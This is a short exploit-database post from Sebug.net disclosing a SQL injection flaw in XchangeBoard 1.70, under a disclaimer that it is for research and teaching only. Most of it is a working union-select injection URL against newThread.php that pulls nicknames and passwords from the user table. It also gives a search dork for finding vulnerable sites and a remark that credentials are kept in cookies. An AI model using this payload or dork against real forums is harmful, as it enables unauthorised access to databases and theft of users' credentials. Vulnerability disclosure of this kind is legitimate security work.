XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability
发布时间(Published):2008-07-02
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
######################
#
# xchangeboard 1.70 final and lower
#
#
######################
#
#Bug by: haZl0oh #
#Dork: "Powered by xchangeboard"
#info:you have to be an registered user to use it like this !!!!
#there should be a lot more vulns there ;)
#
#
#
# credentials like passwords are saved as cookies .... :D
##
###
##
#
#PoC:
#http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*
#
# #
#
#
#######################
#
#Greetz to h0yt3r ,everiZzel & Mastermaefju
#
#######################
#######################
// Sebug.net [ 2008-07-03 ]